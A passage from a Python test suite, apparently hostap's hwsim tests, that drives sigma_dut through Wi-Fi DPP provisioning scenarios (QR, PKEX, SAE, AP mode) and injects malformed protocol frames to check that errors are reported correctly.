conf=sta-psk ssid=%s pass=%s configurator=%d" % (to_hex("DPPNET01"), to_hex("ThisIsDppPassphrase"), conf_id)) cmd = "DPP_LISTEN 2437 role=configurator" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: dev[0].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def test_sigma_dut_dpp_qr_init_enrollee_sae(dev, apdev): """sigma_dut DPP/QR initiator as Enrollee (SAE)""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) if "SAE" not in dev[0].get_capability("auth_alg"): raise HwsimSkip("SAE not supported") params = hostapd.wpa2_params(ssid="DPPNET01", passphrase="ThisIsDppPassphrase") params['wpa_key_mgmt'] = 'SAE' params["ieee80211w"] = "2" hapd = hostapd.add_ap(apdev[0], params) sigma = start_sigma_dut(dev[0].ifname) try: dev[0].set("dpp_config_processing", "2") dev[0].set("sae_groups", "") cmd = "DPP_CONFIGURATOR_ADD" res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) dev[1].set("dpp_configurator_params", " conf=sta-sae ssid=%s pass=%s configurator=%d" % (to_hex("DPPNET01"), to_hex("ThisIsDppPassphrase"), conf_id)) cmd = "DPP_LISTEN 2437 role=configurator" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: dev[0].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def test_sigma_dut_dpp_qr_init_configurator_1(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (conf index 1)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1) def test_sigma_dut_dpp_qr_init_configurator_2(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (conf index 2)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 2) def test_sigma_dut_dpp_qr_init_configurator_3(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (conf index 3)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 3) def test_sigma_dut_dpp_qr_init_configurator_4(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (conf index 4)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 4) def test_sigma_dut_dpp_qr_init_configurator_5(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (conf index 5)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 5) def test_sigma_dut_dpp_qr_init_configurator_6(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (conf index 6)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 6) def test_sigma_dut_dpp_qr_init_configurator_7(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (conf index 7)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 7) def test_sigma_dut_dpp_qr_init_configurator_both(dev, apdev): """sigma_dut DPP/QR initiator as Configurator or Enrollee (conf index 1)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1, "Both") def test_sigma_dut_dpp_qr_init_configurator_neg_freq(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (neg_freq)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1, extra='DPPSubsequentChannel,81/11') def run_sigma_dut_dpp_qr_init_configurator(dev, apdev, conf_idx, prov_role="Configurator", extra=None): check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) sigma = start_sigma_dut(dev[0].ifname) try: id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) cmd = "DPP_LISTEN 2437 role=enrollee" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,%s,DPPConfIndex,%d,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6" % (prov_role, conf_idx) if extra: cmd += "," + extra res = sigma_dut_cmd(cmd) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: stop_sigma_dut(sigma) def test_sigma_dut_dpp_incompatible_roles_init(dev, apdev): """sigma_dut DPP roles incompatible (Initiator)""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) sigma = start_sigma_dut(dev[0].ifname) try: res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR") if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) id1 = dev[1].dpp_qr_code(uri) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) cmd = "DPP_LISTEN 2437 role=enrollee" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6" res = sigma_dut_cmd(cmd) if "BootstrapResult,OK,AuthResult,ROLES_NOT_COMPATIBLE" not in res: raise Exception("Unexpected result: " + res) finally: stop_sigma_dut(sigma) def dpp_init_enrollee_mutual(dev, id1, own_id): logger.info("Starting DPP initiator/enrollee in a thread") time.sleep(1) cmd = "DPP_AUTH_INIT peer=%d own=%d role=enrollee" % (id1, own_id) if "OK" not in dev.request(cmd): raise Exception("Failed to initiate DPP Authentication") ev = dev.wait_event(["DPP-CONF-RECEIVED", "DPP-NOT-COMPATIBLE"], timeout=5) if ev is None: raise Exception("DPP configuration not completed (Enrollee)") logger.info("DPP initiator/enrollee done") def test_sigma_dut_dpp_incompatible_roles_resp(dev, apdev): """sigma_dut DPP roles incompatible (Responder)""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) sigma = start_sigma_dut(dev[0].ifname) try: cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR" res = sigma_dut_cmd(cmd) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) id1 = dev[1].dpp_qr_code(uri) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) t = threading.Thread(target=dpp_init_enrollee_mutual, args=(dev[1], id1, id0)) t.start() cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6" res = sigma_dut_cmd(cmd, timeout=10) t.join() if "BootstrapResult,OK,AuthResult,ROLES_NOT_COMPATIBLE" not in res: raise Exception("Unexpected result: " + res) finally: stop_sigma_dut(sigma) def test_sigma_dut_dpp_pkex_init_configurator(dev, apdev): """sigma_dut DPP/PKEX initiator as Configurator""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) sigma = start_sigma_dut(dev[0].ifname) try: id1 = dev[1].dpp_bootstrap_gen(type="pkex") cmd = "DPP_PKEX_ADD own=%d identifier=test code=secret" % (id1) res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to set PKEX data (responder)") cmd = "DPP_LISTEN 2437 role=enrollee" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCodeIdentifier,test,DPPPKEXCode,secret,DPPTimeout,6") if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: stop_sigma_dut(sigma) def dpp_init_conf(dev, id1, conf, conf_id, extra): logger.info("Starting DPP initiator/configurator in a thread") cmd = "DPP_AUTH_INIT peer=%d conf=%s %s configurator=%d" % (id1, conf, extra, conf_id) if "OK" not in dev.request(cmd): raise Exception("Failed to initiate DPP Authentication") ev = dev.wait_event(["DPP-CONF-SENT"], timeout=5) if ev is None: raise Exception("DPP configuration not completed (Configurator)") logger.info("DPP initiator/configurator done") def test_sigma_dut_ap_dpp_qr(dev, apdev, params): """sigma_dut controlled AP (DPP)""" run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-dpp", "sta-dpp") def test_sigma_dut_ap_dpp_qr_legacy(dev, apdev, params): """sigma_dut controlled AP (legacy)""" run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-psk", "sta-psk", extra="pass=%s" % to_hex("qwertyuiop")) def test_sigma_dut_ap_dpp_qr_legacy_psk(dev, apdev, params): """sigma_dut controlled AP (legacy)""" run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-psk", "sta-psk", extra="psk=%s" % (32*"12")) def run_sigma_dut_ap_dpp_qr(dev, apdev, params, ap_conf, sta_conf, extra=""): check_dpp_capab(dev[0]) logdir = os.path.join(params['logdir'], "sigma_dut_ap_dpp_qr.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default,program,DPP") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR") if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) cmd = "DPP_CONFIGURATOR_ADD" res = dev[0].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id1 = dev[0].dpp_qr_code(uri) t = threading.Thread(target=dpp_init_conf, args=(dev[0], id1, ap_conf, conf_id, extra)) t.start() res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6") t.join() if "ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) id1 = dev[1].dpp_bootstrap_gen(chan="81/1", mac=True) uri1 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id1) id0b = dev[0].dpp_qr_code(uri1) dev[1].set("dpp_config_processing", "2") cmd = "DPP_LISTEN 2412" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") cmd = "DPP_AUTH_INIT peer=%d conf=%s %s configurator=%d" % (id0b, sta_conf, extra, conf_id) if "OK" not in dev[0].request(cmd): raise Exception("Failed to initiate DPP Authentication") dev[1].wait_connected() sigma_dut_cmd_check("ap_reset_default") finally: dev[1].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def test_sigma_dut_ap_dpp_pkex_responder(dev, apdev, params): """sigma_dut controlled AP as DPP PKEX responder""" check_dpp_capab(dev[0]) logdir = os.path.join(params['logdir'], "sigma_dut_ap_dpp_pkex_responder.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: run_sigma_dut_ap_dpp_pkex_responder(dev, apdev) finally: stop_sigma_dut(sigma) def dpp_init_conf_pkex(dev, conf_id, check_config=True): logger.info("Starting DPP PKEX initiator/configurator in a thread") time.sleep(1.5) id = dev.dpp_bootstrap_gen(type="pkex") cmd = "DPP_PKEX_ADD own=%d init=1 conf=ap-dpp configurator=%d code=password" % (id, conf_id) res = dev.request(cmd) if "FAIL" in res: raise Exception("Failed to initiate DPP PKEX") if not check_config: return ev = dev.wait_event(["DPP-CONF-SENT"], timeout=5) if ev is None: raise Exception("DPP configuration not completed (Configurator)") logger.info("DPP initiator/configurator done") def run_sigma_dut_ap_dpp_pkex_responder(dev, apdev): sigma_dut_cmd_check("ap_reset_default,program,DPP") cmd = "DPP_CONFIGURATOR_ADD" res = dev[0].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) t = threading.Thread(target=dpp_init_conf_pkex, args=(dev[0], conf_id)) t.start() res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,PKEX,DPPPKEXCode,password,DPPTimeout,6,DPPWaitForConnect,No", timeout=10) t.join() if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) sigma_dut_cmd_check("ap_reset_default") def test_sigma_dut_dpp_pkex_responder_proto(dev, apdev): """sigma_dut controlled STA as DPP PKEX responder and error case""" check_dpp_capab(dev[0]) sigma = start_sigma_dut(dev[0].ifname) try: run_sigma_dut_dpp_pkex_responder_proto(dev, apdev) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_pkex_responder_proto(dev, apdev): cmd = "DPP_CONFIGURATOR_ADD" res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) dev[1].set("dpp_test", "44") t = threading.Thread(target=dpp_init_conf_pkex, args=(dev[1], conf_id, False)) t.start() res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPProvisioningRole,Enrollee,DPPBS,PKEX,DPPPKEXCode,password,DPPTimeout,6", timeout=10) t.join() if "BootstrapResult,Timeout" not in res: raise Exception("Unexpected result: " + res) def dpp_proto_init(dev, id1): time.sleep(1) logger.info("Starting DPP initiator/configurator in a thread") cmd = "DPP_CONFIGURATOR_ADD" res = dev.request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) cmd = "DPP_AUTH_INIT peer=%d conf=sta-dpp configurator=%d" % (id1, conf_id) if "OK" not in dev.request(cmd): raise Exception("Failed to initiate DPP Authentication") def test_sigma_dut_dpp_proto_initiator(dev, apdev): """sigma_dut DPP protocol testing - Initiator""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) tests = [("InvalidValue", "AuthenticationRequest", "WrappedData", "BootstrapResult,OK,AuthResult,Errorsent", None), ("InvalidValue", "AuthenticationConfirm", "WrappedData", "BootstrapResult,OK,AuthResult,Errorsent", None), ("MissingAttribute", "AuthenticationRequest", "InitCapabilities", "BootstrapResult,OK,AuthResult,Errorsent", "Missing or invalid I-capabilities"), ("InvalidValue", "AuthenticationConfirm", "InitAuthTag", "BootstrapResult,OK,AuthResult,Errorsent", "Mismatching Initiator Authenticating Tag"), ("MissingAttribute", "ConfigurationResponse", "EnrolleeNonce", "BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent", "Missing or invalid Enrollee Nonce attribute")] for step, frame, attr, result, fail in tests: dev[0].request("FLUSH") dev[1].request("FLUSH") sigma = start_sigma_dut(dev[0].ifname) try: run_sigma_dut_dpp_proto_initiator(dev, step, frame, attr, result, fail) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_proto_initiator(dev, step, frame, attr, result, fail): id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) cmd = "DPP_LISTEN 2437 role=enrollee" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr), timeout=10) if result not in res: raise Exception("Unexpected result: " + res) if fail: ev = dev[1].wait_event(["DPP-FAIL"], timeout=5) if ev is None or fail not in ev: raise Exception("Failure not reported correctly: " + str(ev)) dev[1].request("DPP_STOP_LISTEN") dev[0].dump_monitor() dev[1].dump_monitor() def test_sigma_dut_dpp_proto_responder(dev, apdev): """sigma_dut DPP protocol testing - Responder""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) tests = [("MissingAttribute", "AuthenticationResponse", "DPPStatus", "BootstrapResult,OK,AuthResult,Errorsent", "Missing or invalid required DPP Status attribute"), ("MissingAttribute", "ConfigurationRequest", "EnrolleeNonce", "BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent", "Missing or invalid Enrollee Nonce attribute")] for step, frame, attr, result, fail in tests: dev[0].request("FLUSH") dev[1].request("FLUSH") sigma = start_sigma_dut(dev[0].ifname) try: run_sigma_dut_dpp_proto_responder(dev, step, frame, attr, result, fail) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_proto_responder(dev, step, frame, attr, result, fail): res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR") if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) id1 = dev[1].dpp_qr_code(uri) t = threading.Thread(target=dpp_proto_init, args=(dev[1], id1)) t.start() res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr), timeout=10) t.join() if result not in res: raise Exception("Unexpected result: " + res) if fail: ev = dev[1].wait_event(["DPP-FAIL"], timeout=5) if ev is None or fail not in ev: raise Exception("Failure not reported correctly:" + str(ev)) dev[1].request("DPP_STOP_LISTEN") dev[0].dump_monitor() dev[1].dump_monitor() def test_sigma_dut_dpp_proto_stop_at_initiator(dev, apdev): """sigma_dut DPP protocol testing - Stop at RX on Initiator""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) tests = [("AuthenticationResponse", "BootstrapResult,OK,AuthResult,Errorsent", None), ("ConfigurationRequest", "BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent", None)] for frame, result, fail in tests: dev[0].request("FLUSH") dev[1].request("FLUSH") sigma = start_sigma_dut(dev[0].ifname) try: run_sigma_dut_dpp_proto_stop_at_initiator(dev, frame, result, fail) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_proto_stop_at_initiator(dev, frame, result, fail): id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) cmd = "DPP_LISTEN 2437 role=enrollee" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame)) if result not in res: raise Exception("Unexpected result: " + res) if fail: ev = dev[1].wait_event(["DPP-FAIL"], timeout=5) if ev is None or fail not in ev: raise Exception("Failure not reported correctly: " + str(ev)) dev[1].request("DPP_STOP_LISTEN") dev[0].dump_monitor() dev[1].dump_monitor() def test_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, apdev): """sigma_dut DPP protocol testing - Stop at TX on Initiator/Enrollee""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) tests = [("AuthenticationConfirm", "BootstrapResult,OK,AuthResult,Errorsent,LastFrameReceived,AuthenticationResponse", None)] for frame, result, fail in tests: dev[0].request("FLUSH") dev[1].request("FLUSH") sigma = start_sigma_dut(dev[0].ifname, debug=True) try: run_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, frame, result, fail) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, frame, result, fail): id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) cmd = "DPP_LISTEN 2437 role=configurator" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame), timeout=10) if result not in res: raise Exception("Unexpected result: " + res) if fail: ev = dev[1].wait_event(["DPP-FAIL"], timeout=5) if ev is None or fail not in ev: raise Exception("Failure not reported correctly: " + str(ev)) dev[1].request("DPP_STOP_LISTEN") dev[0].dump_monitor() dev[1].dump_monitor() def test_sigma_dut_dpp_proto_stop_at_responder(dev, apdev): """sigma_dut DPP protocol testing - Stop at RX on Responder""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) tests = [("AuthenticationRequest", "BootstrapResult,OK,AuthResult,Errorsent", None), ("AuthenticationConfirm", "BootstrapResult,OK,AuthResult,Errorsent", None)] for frame, result, fail in tests: dev[0].request("FLUSH") dev[1].request("FLUSH") sigma = start_sigma_dut(dev[0].ifname) try: run_sigma_dut_dpp_proto_stop_at_responder(dev, frame, result, fail) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_proto_stop_at_responder(dev, frame, result, fail): res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR") if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) id1 = dev[1].dpp_qr_code(uri) t = threading.Thread(target=dpp_proto_init, args=(dev[1], id1)) t.start() res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame), timeout=10) t.join() if result not in res: raise Exception("Unexpected result: " + res) if fail: ev = dev[1].wait_event(["DPP-FAIL"], timeout=5) if ev is None or fail not in ev: raise Exception("Failure not reported correctly:" + str(ev)) dev[1].request("DPP_STOP_LISTEN") dev[0].dump_monitor() dev[1].dump_monitor() def dpp_proto_init_pkex(dev): time.sleep(1) logger.info("Starting DPP PKEX initiator/configurator in a thread") cmd = "DPP_CONFIGURATOR_ADD" res = dev.request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id = dev.dpp_bootstrap_gen(type="pkex") cmd = "DPP_PKEX_ADD own=%d init=1 conf=sta-dpp configurator=%d code=secret" % (id, conf_id) if "FAIL" in dev.request(cmd): raise Exception("Failed to initiate DPP PKEX") def test_sigma_dut_dpp_proto_initiator_pkex(dev, apdev): """sigma_dut DPP protocol testing - Initiator (PKEX)""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) tests = [("InvalidValue", "PKEXCRRequest", "WrappedData", "BootstrapResult,Errorsent", None), ("MissingAttribute", "PKEXExchangeRequest", "FiniteCyclicGroup", "BootstrapResult,Errorsent", "Missing or invalid Finite Cyclic Group attribute"), ("MissingAttribute", "PKEXCRRequest", "BSKey", "BootstrapResult,Errorsent", "No valid peer bootstrapping key found")] for step, frame, attr, result, fail in tests: dev[0].request("FLUSH") dev[1].request("FLUSH") sigma = start_sigma_dut(dev[0].ifname) try: run_sigma_dut_dpp_proto_initiator_pkex(dev, step, frame, attr, result, fail) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_proto_initiator_pkex(dev, step, frame, attr, result, fail): id1 = dev[1].dpp_bootstrap_gen(type="pkex") cmd = "DPP_PKEX_ADD own=%d code=secret" % (id1) res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to set PKEX data (responder)") cmd = "DPP_LISTEN 2437 role=enrollee" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCode,secret,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr)) if result not in res: raise Exception("Unexpected result: " + res) if fail: ev = dev[1].wait_event(["DPP-FAIL"], timeout=5) if ev is None or fail not in ev: raise Exception("Failure not reported correctly: " + str(ev)) dev[1].request("DPP_STOP_LISTEN") dev[0].dump_monitor() dev[1].dump_monitor() def test_sigma_dut_dpp_proto_responder_pkex(dev, apdev): """sigma_dut DPP protocol testing - Responder (PKEX)""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) tests = [("InvalidValue", "PKEXCRResponse", "WrappedData", "BootstrapResult,Errorsent", None), ("MissingAttribute", "PKEXExchangeResponse", "DPPStatus", "BootstrapResult,Errorsent", "No DPP Status attribute"), ("MissingAttribute", "PKEXCRResponse", "BSKey", "BootstrapResult,Errorsent", "No valid peer bootstrapping key found")] for step, frame, attr, result, fail in tests: dev[0].request("FLUSH") dev[1].request("FLUSH") sigma = start_sigma_dut(dev[0].ifname) try: run_sigma_dut_dpp_proto_responder_pkex(dev, step, frame, attr, result, fail) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_proto_responder_pkex(dev, step, frame, attr, result, fail): t = threading.Thread(target=dpp_proto_init_pkex, args=(dev[1],)) t.start() res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCode,secret,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr), timeout=10) t.join() if result not in res: raise Exception("Unexpected result: " + res) if fail: ev = dev[1].wait_event(["DPP-FAIL"], timeout=5) if ev is None or fail not in ev: raise Exception("Failure not reported correctly:" + str(ev)) dev[1].request("DPP_STOP_LISTEN") dev[0].dump_monitor() dev[1].dump_monitor() def init_sigma_dut_dpp_proto_peer_disc_req(dev, apdev): check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) csign = 